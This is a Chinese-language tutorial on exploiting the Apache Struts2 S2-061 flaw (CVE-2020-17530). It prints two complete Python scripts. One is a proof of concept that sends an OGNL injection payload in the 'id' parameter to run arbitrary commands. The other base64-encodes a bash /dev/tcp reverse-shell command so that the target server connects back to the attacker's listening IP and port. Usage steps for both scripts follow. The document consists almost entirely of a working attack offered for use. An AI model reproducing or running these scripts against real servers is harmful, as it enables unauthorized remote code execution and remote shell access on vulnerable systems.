前言
通过wuzuowei/CVE-2020-17530实现Java框架Struts2远程命令执行漏洞利用
下载项目
1 2
| git clone https://github.com/wuzuowei/CVE-2020-17530.git cd CVE-2020-17530
|
源代码
S2-061-shell.py1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35
| import requests import sys import base64
import urllib
if len(sys.argv)!=2: print('+------------------------------------------------------------+') print('+ Use: python2 S2-061-shell.py http://1.1.1.1:8081 +') print('+ VER: Struts 2.0.0-2.5.25 +') print('+------------------------------------------------------------+') print('+ S2-061 RCE && CVE-2020-17530 +') print('+------------------------------------------------------------+') sys.exit()
ip = raw_input("Please input your listening ip:\n") port = raw_input("Please input your listening port:\n")
base_cmd = "bash -i >& /dev/tcp/"+str(ip)+"/"+str(port)+" 0>&1" mid_cmd = base64.b64encode(base_cmd) final_cmd = "{'bash -c {echo,"+mid_cmd+"}|{base64,-d}|{bash,-i}'}" final_cmd=urllib.quote(final_cmd)
payload = "%25%7B%0A(%23request.map%3D%23application.get('org.apache.tomcat.InstanceManager').newInstance('org.apache.commons.collections.BeanMap')).toString().substring(0%2C0)%20%2B%20%0A(%23request.map.setBean(%23request.get('struts.valueStack'))%20%3D%3D%20true).toString().substring(0%2C0)%20%2B%20%0A(%23request.map2%3D%23application.get('org.apache.tomcat.InstanceManager').newInstance('org.apache.commons.collections.BeanMap')).toString().substring(0%2C0)%20%2B%0A(%23request.map2.setBean(%23request.get('map').get('context'))%20%3D%3D%20true).toString().substring(0%2C0)%20%2B%20%0A(%23request.map3%3D%23application.get('org.apache.tomcat.InstanceManager').newInstance('org.apache.commons.collections.BeanMap')).toString().substring(0%2C0)%20%2B%20%0A(%23request.map3.setBean(%23request.get('map2').get('memberAccess'))%20%3D%3D%20true).toString().substring(0%2C0)%20%2B%20%0A(%23request.get('map3').put('excludedPackageNames'%2C%23application.get('org.apache.tomcat.InstanceManager').newInstance('java.util.HashSet'))%20%3D%3D%20true).toString().substring(0%2C0)%20%2B%20%0A(%23request.get('map3').put('excludedClasses'%2C%23application.get('org.apache.tomcat.InstanceManager').newInstance('java.util.HashSet'))%20%3D%3D%20true).toString().substring(0%2C0)%20%2B%0A(%23application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec("+final_cmd+"))%0A%7D"
def exp(url): tturl=url+"/?id="+payload print(tturl) requests.get(tturl)
if __name__=='__main__': url=str(sys.argv[1]) exp(url)
|
struts2-061-poc.py1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34
| import requests import sys from lxml import etree
def exp(url,cmd): payload="%25%7b(%27Powered_by_Unicode_Potats0%2cenjoy_it%27).(%23UnicodeSec+%3d+%23application%5b%27org.apache.tomcat.InstanceManager%27%5d).(%23potats0%3d%23UnicodeSec.newInstance(%27org.apache.commons.collections.BeanMap%27)).(%23stackvalue%3d%23attr%5b%27struts.valueStack%27%5d).(%23potats0.setBean(%23stackvalue)).(%23context%3d%23potats0.get(%27context%27)).(%23potats0.setBean(%23context)).(%23sm%3d%23potats0.get(%27memberAccess%27)).(%23emptySet%3d%23UnicodeSec.newInstance(%27java.util.HashSet%27)).(%23potats0.setBean(%23sm)).(%23potats0.put(%27excludedClasses%27%2c%23emptySet)).(%23potats0.put(%27excludedPackageNames%27%2c%23emptySet)).(%23exec%3d%23UnicodeSec.newInstance(%27freemarker.template.utility.Execute%27)).(%23cmd%3d%7b%27"+cmd+"%27%7d).(%23res%3d%23exec.exec(%23cmd))%7d" tturl=url+"/?id="+payload r=requests.get(tturl) page=r.text
page=etree.HTML(page) data = page.xpath('//a[@id]/@id') print(data[0])
if __name__=='__main__': print('+------------------------------------------------------------+') print('+ PoC: python struts2-061-poc.py http://1.1.1.1:8081 id +') print('+ VER: Struts 2.0.0-2.5.25 +') print('+------------------------------------------------------------+') print('+ S2-061 RCE && CVE-2020-17530 +') print('+------------------------------------------------------------+') if len(sys.argv)!=3: print("[+]ussage: http://ip:port command") print("[+]============================================================") sys.exit() url=sys.argv[1] cmd=sys.argv[2] exp(url,cmd)
|
poc
<shell>
:远程执行的Shell命令
1
| python2 struts2-061-poc.py <url> <shell>
|
exp
攻击者监听反弹Shell
受害者反弹Shell
<ip_local>
:攻击者IP地址
<port_local>
:攻击者端口号
1
| python2 S2-061-shell.py <url>
|
1 2 3 4
| Please input your listening ip: <ip_local> Please input your listening port: <port_local>
|
完成